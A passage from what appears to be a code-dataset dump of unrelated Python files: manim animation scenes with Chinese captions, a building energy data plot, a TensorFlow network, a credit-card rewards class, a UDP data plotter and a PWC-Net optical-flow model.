ret = RoundedRectangle(\r\n height = all_txt.get_height()+ret_buff,\r\n width = all_txt.get_width()+ret_buff,\r\n color = BLACK,\r\n fill_opacity = 0.5,\r\n corner_radius = 0.2,\r\n stroke_opacity = 0\r\n ).move_to(all_txt)\r\n\r\n self.play(\r\n FadeIn(ret),\r\n LaggedStartMap(\r\n FadeInFromDown,all_txt,\r\n lag_ratio=0.2\r\n )\r\n )\r\n self.wait()\r\n\r\nclass Music7(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"赫伯特·冯·卡拉扬\",\r\n name_eng = \"Herbert von Karajan\",\r\n bir = \"1908年4月5日-1989年7月16日\",\r\n intro = \"奥地利指挥家、演奏家、导演,被誉为“指挥帝王”\",\r\n ) \r\n\r\nclass Music8(Scene):\r\n def construct(self):\r\n img = ImageMobject(\"pic/茱莉亚学院\",height=FRAME_HEIGHT)\r\n self.add(img)\r\n introduction(\r\n self,\r\n name_ch = \"茱莉亚学院\",\r\n name_eng = \"The Juilliard School\",\r\n bir = \"成立于1905年\",\r\n intro = \"世界顶级的表演艺术学校之一\",\r\n )\r\n\r\nclass Music9(Scene):\r\n \r\n def construct(self):\r\n text1 = Text(\r\n \"为什么学乐器要先学钢琴?\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n ).shift(0.238*UP)\r\n self.play(FadeInFromLarge(text1))\r\n self.wait()\r\n\r\nclass Music10(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"西方音乐之父巴赫在弹风琴(钢琴前身)\",\r\n )\r\n\r\nclass Music11(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"幼年时期正在练琴的巴洛克流行天王亨德尔\",\r\n )\r\n\r\nclass Music12(Scene):\r\n def construct(self):\r\n introduction(\r\n self,\r\n name_ch = \"约瑟夫·海顿\",\r\n name_eng = \"Joseph Haydn\",\r\n )\r\n\r\n\r\nclass TianXin2(Scene):\r\n def construct(self):\r\n name_chinese = Text(\"再见小薇\",font=\"思源黑体 CN Heavy\",size=3)\r\n introduction = Text(\r\n
\"她怯怯的低着头,不安地搓着双手,在候诊大厅走来走去\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=2,\r\n color=BLUE\r\n )\r\n all_txt = VGroup(\r\n name_chinese,\r\n introduction\r\n ).arrange(\r\n DOWN,\r\n aligned_edge=LEFT,\r\n buff = 0.5\r\n ).scale(0.36).to_corner(DL).shift(UP*0.5)\r\n ret_buff = 0.5\r\n ret = RoundedRectangle(\r\n height = all_txt.get_height()+ret_buff,\r\n width = all_txt.get_width()+ret_buff,\r\n color = BLACK,\r\n fill_opacity = 0.3,\r\n corner_radius = 0.15,\r\n stroke_opacity = 0\r\n ).move_to(all_txt)\r\n\r\n self.play(\r\n FadeIn(ret),\r\n LaggedStartMap(\r\n FadeInFromDown,all_txt,\r\n lag_ratio=0.2\r\n )\r\n )\r\n self.wait()\r\n\r\nclass TianXin3(Scene):\r\n def construct(self):\r\n text1 = Text(\r\n \"只有生命才能进入生命,\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n ).shift(UP)\r\n text2 = Text(\r\n \"只有灵魂才能与灵魂交流。\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n ).next_to(text1,DOWN,buff=0.36)\r\n self.play(\r\n LaggedStartMap(\r\n Write,\r\n [text1,text2],\r\n lag_ratio=1\r\n )\r\n )\r\n self.wait()\r\n\r\n\r\nclass TianXin4(Scene):\r\n def construct(self):\r\n name_chinese = Text(\"送别小薇\",font=\"思源黑体 CN Heavy\",size=3)\r\n introduction = Text(\r\n \"看着她小巧而坚毅的背影,我多了份暖心的回忆\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.8,\r\n color=BLUE\r\n )\r\n all_txt = VGroup(\r\n name_chinese,\r\n introduction\r\n ).arrange(\r\n DOWN,\r\n aligned_edge=LEFT,\r\n buff = 0.5\r\n ).scale(0.36).to_corner(DL).shift(UP*0.5)\r\n ret_buff = 0.5\r\n ret = RoundedRectangle(\r\n height = all_txt.get_height()+ret_buff,\r\n width = all_txt.get_width()+ret_buff,\r\n color = BLACK,\r\n fill_opacity = 0.3,\r\n corner_radius = 0.15,\r\n stroke_opacity = 0\r\n ).move_to(all_txt)\r\n\r\n self.play(\r\n FadeIn(ret),\r\n LaggedStartMap(\r\n FadeInFromDown,all_txt,\r\n lag_ratio=0.2\r\n )\r\n )\r\n self.wait()\r\n\r\nclass TianXin8(Scene):\r\n def construct(self):\r\n introduction(self,name_ch=\"遇见叙事,遇见更好的自己\" )\r\n self.wait()\r\n\r\nclass TianXin5(Scene):\r\n def construct(self):\r\n text2 = Text(\r\n \"口腔二科\",\r\n color = BLACK,\r\n size = 1\r\n )\r\n self.play(Write(text2))\r\n self.wait()\r\n\r\n\r\nclass TianXin5(Scene):\r\n def construct(self):\r\n text2 = Text(\r\n \"口腔二科\",\r\n color = BLACK,\r\n size = 1\r\n )\r\n self.play(Write(text2))\r\n self.wait()\r\n\r\nclass TianXin6(Scene):\r\n def construct(self):\r\n text3 = Text(\r\n \"汇报者:李艳、王樱、成真、谢智敏(医生)\",\r\n color=BLUE,\r\n size=1.2,\r\n )\r\n\r\n self.play(FadeInFromDirections(text3))\r\n self.wait()\r\n \r\nclass Text10(Scene):\r\n def construct(self):\r\n text = TexMobject(\"\\\\times10^6\",size=6,)\r\n self.add(text)\r\n self.wait()","sub_path":"Ag/MyCode/musicTian.py","file_name":"musicTian.py","file_ext":"py","file_size_in_byte":9819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"232171334","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n#Load the path of the Excel files for AC consumption, Weather and irradiance\nDataPath=\"/Users/Marrugo/Dropbox/git_for_clone/Data-driven_Building_simulation_Polimi_EETBS/Data/\"\nconsumption=\"consumption_5545.csv\"\nweather=\"Austin_weather_2014.csv\"\nirradiance=\"irradiance_2014_gen.csv\"\n#compiling the path for the Excel files of AC consumption, Weather and irradiance\nConsumpitionFile=DataPath+consumption\nWeather=DataPath+weather\nIrradiance=DataPath+irradiance\n#import data frame of the values for AC consuption, Weather and 
irradiance\nDF_consumption=pd.read_csv(ConsumpitionFile,sep=\",\",index_col=0)\nDF_weather=pd.read_csv(Weather,sep=\";\",index_col=0)\nDF_irradiance=pd.read_csv(Irradiance,sep=\";\",index_col=1)\n#Change the index of the Data frame of weather to data time \npreviusindex=DF_weather.index\nparsedindex=pd.to_datetime(previusindex)\nDF_weather.index=parsedindex\n#Change the index of the Data frame of irradiance to data time\npreviusindex=DF_irradiance.index\nparsedindex=pd.to_datetime(previusindex)\nDF_irradiance.index=parsedindex\n#Change the index of the Data frame of consumption to data time\npreviusindex=DF_consumption.index\nparsedindex=pd.to_datetime(previusindex)\nDF_consumption.index=parsedindex\nDF_consumption.head()\n#Selecting the rage of AC consuption, Weather and irradiance between June 1th of 2014 until June 3th of 2014\nRangeDateConsumption=DF_consumption[\"2014-06-01 00:00:00\":\"2014-06-03 23:00:00\"]\nRangeDateWeather=DF_weather[[\"temperature\"]][\"2014-06-01 00:00:00\":\"2014-06-03 23:00:00\"]\nRangeDateIrradiance=DF_irradiance[[\"gen\"]][\"2014-06-01 00:00:00\":\"2014-06-03 23:00:00\"]\n#Correcting Irradiance data\nRangeDateIrradiance[RangeDateIrradiance[\"gen\"]<0]=0\n#Compiling data of AC consuption, Weather and irradiance\nDF_DataTexas=RangeDateConsumption.join([RangeDateWeather,RangeDateIrradiance])\n#Ploting the data\nDF_DataTexas.plot()\nplt.xlabel(\"time\")\nplt.ylabel(\"AC consumption (W)\")\n\n#Ploting using subplots a double Y axis\n\n#Defining number of subplots\nf, axes = plt.subplots(2, 1)\n#Ploting in subplot 1 data of AC consumption\naxes[0].plot(RangeDateConsumption, 'b-')\n#Y label for AC consumption in subplot 1\naxes[0].set_ylabel('AC consumption (W)', color='b')\naxes[0].tick_params('y', colors='b')\n#Creating double Y axis in subplot 1\nax21 = axes[0].twinx()\n#Ploting in subplot 1 data of weather\nax21.plot(RangeDateWeather, 'r-')\n#Y label weather in subplot 1\nax21.set_ylabel('Temperature (F)', color='r')\nax21.tick_params('y', colors='r')\n#Ploting in subplot 2 data of AC consumption\naxes[1].plot(RangeDateConsumption, 'b-')\n#x label for all data in all subplots \naxes[1].set_xlabel('Time (Data time)')\n#Y label for AC consumption in subplot 1\naxes[1].set_ylabel('AC consumption (W)', color='b')\naxes[1].tick_params('y', colors='b')\n#Creating double Y axis in subplot 2\nax22 = axes[1].twinx()\n#Ploting in subplot 2 data of Irradiance\nax22.plot(RangeDateIrradiance, 'r-')\n#Y label for Irradiance in subplot 2\nax22.set_ylabel('Irradiance (W/m2)', color='r')\nax22.tick_params('y', colors='r')\nplt.show()","sub_path":"Assignment 11- Deadline Dec19th_DataDrivenBuildingExplorationStep/Assignment11_MARRUGO/Assignment11_MARRUGO.py","file_name":"Assignment11_MARRUGO.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"55829510","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\n\nINPUT_NODE = 784 # 输入层\nOUTPUT_NODE = 10 # 输出层\n# 隐藏层\nL = 200\nM = 100\nN = 60\nO = 30\n\n\ndef get_weight_variable(shape, regularizer=None):\n \"\"\"\n 获取某一层的W参数\n :param shape: weight的shape\n :param regularizer: 正则化生成函数\n :return: weight\n \"\"\"\n weights = tf.Variable(tf.truncated_normal(shape, stddev=.1))\n\n # 如果提供了正则化函数,则一并加入regularization集合\n if regularizer is not None:\n tf.add_to_collection('regularization', regularizer(weights))\n\n return weights\n\ndef inference(X, regularizer):\n \"\"\"\n 定义神经网络前向传播过程\n :param X: 输入 X\n :param regularizer: 正则化函数\n :return: 输出 
Y\n \"\"\"\n with tf.name_scope('layer'):\n W1 = get_weight_variable([INPUT_NODE, L], regularizer)\n b1 = tf.Variable(tf.constant(.1, shape=[L]))\n W2 = get_weight_variable([L, M], regularizer)\n b2 = tf.Variable(tf.constant(.1, shape=[M]))\n W3 = get_weight_variable([M, N], regularizer)\n b3 = tf.Variable(tf.constant(.1, shape=[N]))\n W4 = get_weight_variable([N, O], regularizer)\n b4 = tf.Variable(tf.constant(.1, shape=[O]))\n W5 = get_weight_variable([O, OUTPUT_NODE], regularizer)\n b5 = tf.Variable(tf.constant(.1, shape=[OUTPUT_NODE]))\n\n Y1 = tf.nn.relu(tf.matmul(X, W1) + b1)\n Y2 = tf.nn.relu(tf.matmul(Y1, W2) + b2)\n Y3 = tf.nn.relu(tf.matmul(Y2, W3) + b3)\n Y4 = tf.nn.relu(tf.matmul(Y3, W4) + b4)\n Ylogits = tf.matmul(Y4, W5) + b5\n\n return Ylogits\n","sub_path":"tf/relu/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"27118051","text":"# Written by Philip M. White \n# Copyright 2009.\n# Licensed under the BSD license.\n\nfrom CreditCard import *\n\nclass CreditCardAmexGoldDeltaSkymiles(CreditCard):\n\tdef __init__(self, airtravel):\n\t\tself.name = \"American Express Gold Delta Skymiles\"\n\t\tself.url = \"http://www201.americanexpress.com/getthecard/learn-about/Gold-Delta-Skymiles\"\n\t\tself.annual_fee = Money(95*100)\n\t\tself.reward_types = set(['travel'])\n\t\tself.airtravel = airtravel\n\n\tdef getAnnualRewardsEarned(self, s):\n\t\ts = min(Money(100000*100), s)\n\t\ttherest = s - self.airtravel\n\t\treturn self.airtravel*0.02 + therest*0.01\n","sub_path":"cards/CreditCardAmexGoldDeltaSkymiles.py","file_name":"CreditCardAmexGoldDeltaSkymiles.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"146338321","text":"#!/usr/bin/python3.4\n\nimport sys \nimport string\nimport time\n\nimport numpy as np\nfrom matplotlib import pyplot\n\nfrom femb_udp_cmdline import FEMB_UDP\nfemb = FEMB_UDP()\n\npyplot.ion()\npyplot.show()\n\nfrom pylab import rcParams\nrcParams['figure.figsize'] = 16, 8\n\nfig, ax = pyplot.subplots(2, 1)\n\nYfft_total = []\nfirst = 1\n\nwhile 1:\n data = femb.get_data(10)\n if data == None:\n time.sleep(1.)\n continue\n if len(data ) == 0:\n time.sleep(1.)\n continue\n xpoint = []\n ypoint = []\n num = 0\n\n for samp in data:\n chNum = ((samp >> 12 ) & 0xF)\n sampVal = (samp & 0xFFF)\n #print str(chNum) + \"\\t\" + str(sampVal) + \"\\t\" + str( hex(sampVal) )\n #if chNum == 0:\n xpoint.append(num*0.5)\n ypoint.append(sampVal)\n num = num + 1\n\n xarr = np.array(xpoint)\n yarr = np.array(ypoint)\n\n Fs = 2.0; # sampling rate\n Ts = 1.0/Fs; # sampling interval\n t = np.arange(0,1,Ts) # time vector\n\n n = len(yarr) # length of the signal\n k = np.arange(n)\n T = n/Fs\n frq = k/T # two sides frequency range\n frq = frq[range(n/2)] # one side frequency range\n\n Yfft = np.fft.fft(yarr)/n # fft computing and normalization\n Yfft = Yfft[range(n/2)]\n frq = frq[1:]\n Yfft = Yfft[1:]\n\n #do averaging and normalization, very messy\n pos = 0\n total = 0\n for x in np.nditer(Yfft):\n #print abs(x)\n total = total + abs(x)\n if first == 1:\n Yfft_total.append( abs(x) )\n else:\n Yfft_total[pos] = Yfft_total[pos] + abs(x)\n pos = pos + 1\t\n\n first = 0\n if total < 0 :\n time.sleep(0.1)\n continue\n\n pos = 0\n Yfft_norm = []\n for bin in Yfft_total:\n Yfft_norm.append( bin / total)\n\n ax[0].cla()\n ax[1].cla()\n ax[0].plot(xarr,yarr)\n 
ax[0].set_xlabel('Time [us]')\n ax[0].set_ylabel('Sample Value (ADC counts)')\n #ax[1].plot(frq,abs(Yfft),'r') # plotting the spectrum\n ax[1].plot(frq,Yfft_norm,'r') # plotting the spectrum\n ax[1].set_xlabel('Freq (MHz)')\n ax[1].set_ylabel('|Y(freq)|')\n\n pyplot.draw()\n time.sleep(0.1)\n #pyplot.clf()\n\t\n#need to exit nicely, ctrl-c for now\n\n\t\n","sub_path":"plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"628450685","text":"import torch\nimport math\nimport sys\nfrom asset import correlation\n\nbackwarp_tenGrid = {}\nbackwarp_tenPartial = {}\n\ndef backwarp(tenInput, tenFlow):\n\tif str(tenFlow.shape) not in backwarp_tenGrid:\n\t\ttenHor = torch.linspace(-1.0 + (1.0 / tenFlow.shape[3]), 1.0 - (1.0 / tenFlow.shape[3]), tenFlow.shape[3]).view(1, 1, 1, -1).expand(-1, -1, tenFlow.shape[2], -1)\n\t\ttenVer = torch.linspace(-1.0 + (1.0 / tenFlow.shape[2]), 1.0 - (1.0 / tenFlow.shape[2]), tenFlow.shape[2]).view(1, 1, -1, 1).expand(-1, -1, -1, tenFlow.shape[3])\n\n\t\tbackwarp_tenGrid[str(tenFlow.shape)] = torch.cat([ tenHor, tenVer ], 1).cuda()\n\t# end\n\n\tif str(tenFlow.shape) not in backwarp_tenPartial:\n\t\tbackwarp_tenPartial[str(tenFlow.shape)] = tenFlow.new_ones([ tenFlow.shape[0], 1, tenFlow.shape[2], tenFlow.shape[3] ])\n\t# end\n\n\ttenFlow = torch.cat([ tenFlow[:, 0:1, :, :] / ((tenInput.shape[3] - 1.0) / 2.0), tenFlow[:, 1:2, :, :] / ((tenInput.shape[2] - 1.0) / 2.0) ], 1)\n\ttenInput = torch.cat([ tenInput, backwarp_tenPartial[str(tenFlow.shape)] ], 1)\n\n\ttenOutput = torch.nn.functional.grid_sample(input=tenInput, grid=(backwarp_tenGrid[str(tenFlow.shape)] + tenFlow).permute(0, 2, 3, 1), mode='bilinear', padding_mode='zeros', align_corners=False)\n\n\ttenMask = tenOutput[:, -1:, :, :]; tenMask[tenMask > 0.999] = 1.0; tenMask[tenMask < 1.0] = 0.0\n\n\treturn tenOutput[:, :-1, :, :] * tenMask\n# end\n\n##########################################################\n\nclass Network(torch.nn.Module):\n\tdef __init__(self):\n\t\tsuper(Network, self).__init__()\n\n\t\tclass Extractor(torch.nn.Module):\n\t\t\tdef __init__(self):\n\t\t\t\tsuper(Extractor, self).__init__()\n\n\t\t\t\tself.netOne = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=16, out_channels=16, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netTwo = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=32, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netThr = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, 
negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFou = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=96, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=96, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=96, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFiv = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=128, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netSix = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=196, kernel_size=3, stride=2, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=196, out_channels=196, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=196, out_channels=196, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\t\t\t# end\n\n\t\t\tdef forward(self, tenInput):\n\t\t\t\ttenOne = self.netOne(tenInput)\n\t\t\t\ttenTwo = self.netTwo(tenOne)\n\t\t\t\ttenThr = self.netThr(tenTwo)\n\t\t\t\ttenFou = self.netFou(tenThr)\n\t\t\t\ttenFiv = self.netFiv(tenFou)\n\t\t\t\ttenSix = self.netSix(tenFiv)\n\n\t\t\t\treturn [ tenOne, tenTwo, tenThr, tenFou, tenFiv, tenSix ]\n\t\t\t# end\n\t\t# end\n\n\t\tclass Decoder(torch.nn.Module):\n\t\t\tdef __init__(self, intLevel):\n\t\t\t\tsuper(Decoder, self).__init__()\n\n\t\t\t\tintPrevious = [ None, None, 81 + 32 + 2 + 2, 81 + 64 + 2 + 2, 81 + 96 + 2 + 2, 81 + 128 + 2 + 2, 81, None ][intLevel + 1]\n\t\t\t\tintCurrent = [ None, None, 81 + 32 + 2 + 2, 81 + 64 + 2 + 2, 81 + 96 + 2 + 2, 81 + 128 + 2 + 2, 81, None ][intLevel + 0]\n\n\t\t\t\tif intLevel < 6: self.netUpflow = torch.nn.ConvTranspose2d(in_channels=2, out_channels=2, kernel_size=4, stride=2, padding=1)\n\t\t\t\tif intLevel < 6: self.netUpfeat = torch.nn.ConvTranspose2d(in_channels=intPrevious + 128 + 128 + 96 + 64 + 32, out_channels=2, kernel_size=4, stride=2, padding=1)\n\t\t\t\tif intLevel < 6: self.fltBackwarp = [ None, None, None, 5.0, 2.5, 1.25, 0.625, None ][intLevel + 1]\n\n\t\t\t\tself.netOne = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent, out_channels=128, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netTwo = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128, out_channels=128, kernel_size=3, stride=1, 
padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netThr = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128, out_channels=96, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFou = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128 + 96, out_channels=64, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netFiv = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128 + 96 + 64, out_channels=32, kernel_size=3, stride=1, padding=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1)\n\t\t\t\t)\n\n\t\t\t\tself.netSix = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=intCurrent + 128 + 128 + 96 + 64 + 32, out_channels=2, kernel_size=3, stride=1, padding=1)\n\t\t\t\t)\n\t\t\t# end\n\n\t\t\tdef forward(self, tenFirst, tenSecond, objPrevious):\n\t\t\t\ttenFlow = None\n\t\t\t\ttenFeat = None\n\n\t\t\t\tif objPrevious is None:\n\t\t\t\t\ttenFlow = None\n\t\t\t\t\ttenFeat = None\n\n\t\t\t\t\ttenVolume = torch.nn.functional.leaky_relu(input=correlation.FunctionCorrelation(tenFirst=tenFirst, tenSecond=tenSecond), negative_slope=0.1, inplace=False)\n\n\t\t\t\t\ttenFeat = torch.cat([ tenVolume ], 1)\n\n\t\t\t\telif objPrevious is not None:\n\t\t\t\t\ttenFlow = self.netUpflow(objPrevious['tenFlow'])\n\t\t\t\t\ttenFeat = self.netUpfeat(objPrevious['tenFeat'])\n\n\t\t\t\t\ttenVolume = torch.nn.functional.leaky_relu(input=correlation.FunctionCorrelation(tenFirst=tenFirst, tenSecond=backwarp(tenInput=tenSecond, tenFlow=tenFlow * self.fltBackwarp)), negative_slope=0.1, inplace=False)\n\n\t\t\t\t\ttenFeat = torch.cat([ tenVolume, tenFirst, tenFlow, tenFeat ], 1)\n\n\t\t\t\t# end\n\n\t\t\t\ttenFeat = torch.cat([ self.netOne(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netTwo(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netThr(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netFou(tenFeat), tenFeat ], 1)\n\t\t\t\ttenFeat = torch.cat([ self.netFiv(tenFeat), tenFeat ], 1)\n\n\t\t\t\ttenFlow = self.netSix(tenFeat)\n\n\t\t\t\treturn {\n\t\t\t\t\t'tenFlow': tenFlow,\n\t\t\t\t\t'tenFeat': tenFeat\n\t\t\t\t}\n\t\t\t# end\n\t\t# end\n\n\t\tclass Refiner(torch.nn.Module):\n\t\t\tdef __init__(self):\n\t\t\t\tsuper(Refiner, self).__init__()\n\n\t\t\t\tself.netMain = torch.nn.Sequential(\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=81 + 32 + 2 + 2 + 128 + 128 + 96 + 64 + 32, out_channels=128, kernel_size=3, stride=1, padding=1, dilation=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=2, dilation=2),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=4, dilation=4),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=128, out_channels=96, kernel_size=3, stride=1, padding=8, dilation=8),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=96, out_channels=64, kernel_size=3, stride=1, padding=16, dilation=16),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=64, out_channels=32, 
kernel_size=3, stride=1, padding=1, dilation=1),\n\t\t\t\t\ttorch.nn.LeakyReLU(inplace=False, negative_slope=0.1),\n\t\t\t\t\ttorch.nn.Conv2d(in_channels=32, out_channels=2, kernel_size=3, stride=1, padding=1, dilation=1)\n\t\t\t\t)\n\t\t\t# end\n\n\t\t\tdef forward(self, tenInput):\n\t\t\t\treturn self.netMain(tenInput)\n\t\t\t# end\n\t\t# end\n\n\t\tself.netExtractor = Extractor()\n\n\t\tself.netTwo = Decoder(2)\n\t\tself.netThr = Decoder(3)\n\t\tself.netFou = Decoder(4)\n\t\tself.netFiv = Decoder(5)\n\t\tself.netSix = Decoder(6)\n\n\t\tself.netRefiner = Refiner()\n\n\t\tself.load_state_dict({ strKey.replace('module', 'net'): tenWeight for strKey, tenWeight in torch.hub.load_state_dict_from_url(url='http://content.sniklaus.com/github/pytorch-pwc/network-' + 'default' + '.pytorch', file_name='pwc-' + 'default').items() })\n\t# end\n\n\tdef forward(self, tenFirst, tenSecond):\n\t\ttenFirst = self.netExtractor(tenFirst)\n\t\ttenSecond = self.netExtractor(tenSecond)\n\n\t\tobjEstimate = self.netSix(tenFirst[-1], tenSecond[-1], None)\n\t\tobjEstimate = self.netFiv(tenFirst[-2], tenSecond[-2], objEstimate)\n\t\tobjEstimate = self.netFou(tenFirst[-3], tenSecond[-3], objEstimate)\n\t\tobjEstimate = self.netThr(tenFirst[-4], tenSecond[-4], objEstimate)\n\t\tobjEstimate = self.netTwo(tenFirst[-5], tenSecond[-5], objEstimate)\n\n\t\treturn objEstimate['tenFlow'] + self.netRefiner(objEstimate['tenFeat'])\n\t# end\n# end\n\nnetNetwork = None\n\n##########################################################\n\ndef estimate(tenFirst, tenSecond):\n\tglobal netNetwork\n\n\tif netNetwork is None:\n\t\tnetNetwork = Network().cuda().eval()\n\t# end\n\n\tassert(tenFirst.shape[1] == tenSecond.shape[1])\n\tassert(tenFirst.shape[2] == tenSecond.shape[2])\n\n\tintWidth = tenFirst.shape[2]\n\tintHeight = tenFirst.shape[1]\n\n\t#assert(intWidth == 1024) # remember that there is no guarantee for correctness, comment this line out if you acknowledge this and want to continue\n\t#assert(intHeight == 436) # remember that there is no guarantee for correctness, comment this line out if you acknowledge this and want to continue\n\n\ttenPreprocessedFirst = tenFirst.cuda().view(1, 3, intHeight, intWidth)\n\ttenPreprocessedSecond = tenSecond.cuda().view(1, 3, intHeight, intWidth)\n\n\tintPreprocessedWidth = int(math.floor(math.ceil(intWidth / 64.0) * 64.0))\n\tintPreprocessedHeight = int(math.floor(math.ceil(intHeight / 64.0) * 64.0))\n\n\ttenPreprocessedFirst = 